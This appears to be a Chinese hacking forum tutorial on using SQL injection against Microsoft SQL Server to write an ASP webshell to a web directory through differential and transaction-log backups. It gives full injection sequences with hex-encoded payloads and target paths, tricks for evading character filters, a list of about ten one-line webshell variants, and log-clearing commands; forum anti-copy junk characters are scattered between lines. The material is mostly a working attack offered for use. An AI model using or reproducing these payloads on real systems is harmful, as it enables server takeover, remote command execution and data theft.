MSsql差异备份总结

admin

差异备份的流程大概这样：
1.完整备份一次(保存位置当然可以改)
: C4 m: m& n9 W# Y  @% vbackup database 库名 to disk = 'c:\ddd.bak';--
: n* {# W# V" k/ X- g
2.创建表并插曲入数据
create table [dbo].[dtest] ([cmd] [image]);
9 P$ a% J+ K% e0 [insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
- a" @. {% `8 _0 m
- s+ R' `9 n, N% ^% i8 A( k6 I3.进行差异备份
backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

) J! Z& o9 c1 y3 T/ U- W5 P$ ~上面
; I5 V7 ?4 e( J5 z, E- m( e0 h4 z0x3C25657865637574652872657175657374282261222929253E
就是一句话木马的内容：<%execute(request("a"))%>

如下是网上常见的差异备份代码，思路一样！
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:
+ _# `  \3 @5 Q4 c
5 n' @* b& A8 |% i9 u6 ydeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库
- ~7 h; E# V. I% f/ J# X9 }
- Z) d4 u5 Y0 y# k* qcreate table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表

) I4 B9 E: u3 S2 i
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中
+ p) W& t  z' p0 Z0 r5 K: i
4 H+ Y+ v/ W# C" q: d  Gdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份

0 A9 ?6 v* D* n1 t7 H/ ?drop table [xiaolu]  -- 删除此表。
0 \) O1 T1 b$ a* [
0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
% m' F' p* p2 Q( A9 @0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
2 U# H! J, T7 d
声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
===============================================================

0 J* u7 M  v% E我发现上面代码，有时会无效，而直接用

backup database 库名 to disk = 'c:\ddd.bak'

( v# V3 T- E' [create table [dbo].[dtest] ([cmd] [image]);
) G! X, z3 v, G8 \
: y/ p9 X/ W# g3 K* l9 N' tinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

0 s. f7 ~+ G4 H: a" U7 v+ P% Z4 c) Hbackup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--

却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

0 r, I) ~. v& W- m" p( P; p$ e* F库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！

1 @' ~0 @; \; ~! G网上还有log增量备份的，我也把他记录一下
5 J6 `& H5 w/ @$ I0 h/ H: }=====================================================
- v9 e4 Z6 Z4 b2 a& b& G+ j另一种log增量备份技术:

';alter database null set RECOVERY FULL--
, @0 ^. [9 E) b
1 p: Q9 }& J$ e4 O* e" l';create table cmd (a image)--

$ U4 ?1 s2 i" z0 l. [( j6 z- f6 g';backup log null to disk = 'f:\cmd' with init--

';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
, X! P( l8 G  f
';backup log null to disk = '备份路径'--
/ U4 u9 c+ Y# S# F7 m6 N' J  b! u
7 F& E! g, o+ Q( _3 u, Z';drop table cmd--
1 M/ g0 I0 B# c( O1 [9 b/ `
8 X7 O$ w4 r2 M';alter database XXX set RECOVERY SIMPLE--
; @$ Z* u3 ]' R+ I# d3 D) A1 D
PS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的
, Z) @! ?! h. g: c. l" i
说到一句话马，还可以有这么几种写法：
6 A: I5 q5 F" B* k6 U; H. s$ h
a)<%%25Execute(request("a"))%%25>
b)<%Execute(request("a"))%>
c)%><%execute request("a")%><%
2 r2 J- }' ]$ `. |0 a9 G6 Fd)<script language=VBScript runat=server>execute request("a")</script>
3 Y" X3 h- ~0 B/ @# U2 Ue)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
( L6 z2 A. X4 T8 F+ S. f5 f$ d1 b" Jg)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
- O, a3 e. M, n0 R9 \h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
; K4 W4 e1 [' j  `; `; J' {I)<%eval request(0)%>
J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

4 |; I3 J% }' x; v=============================================
4 w6 [/ |# F" T- |2 F3 w
当遇到差备过滤了/时用这个语句代替

declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--
/ |% M, w. L# H8 Z* M- ^$ \
把要执行的语句转16进制然后用exec执行


) M; d! A8 E9 y* Z9 w3 y减少备份文件大小方法如下:

总的来说就是那么简单几句,下面以备份数据库model为例子
( T3 u2 k9 d" y1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
- }2 T/ ~  G3 c( }! @: X9 \id=1;backup database model to disk='你的路径‘ with differential,format;--
: X5 }) |+ P# ^6 y0 {6 g% @
$ n1 E4 B/ l5 P4 c: f/ b

' \4 O( x7 E6 fSQL语句清理日志
7 y3 M, _, p: Z% l' C( k! T注：test为数据库名
: S; o5 V0 V' H6 Z* t' B
6 t5 t# F/ `% b7 _4 A- Q4 n9 Z--清空日志
DUMP TRANSACTION test WITH NO_LOG
# d3 P# Z  G9 A5 L
# F- r6 Y' [) J3 \5 X% A0 O+ S--截断事务日志
( f. b& Y$ @2 Q! W" A4 b3 \% Z. ZBACKUP LOG test WITH NO_LOG
- ]2 M: U  H+ R$ Y
--收缩数据库
DBCC SHRINKDATABASE(test)
0 ]; F+ `& f3 e$ }- E. [# x
. n6 Z  O- O  D6 i$ d: |! [: i7 |--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)
1 G, ?6 m* p6 f
--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'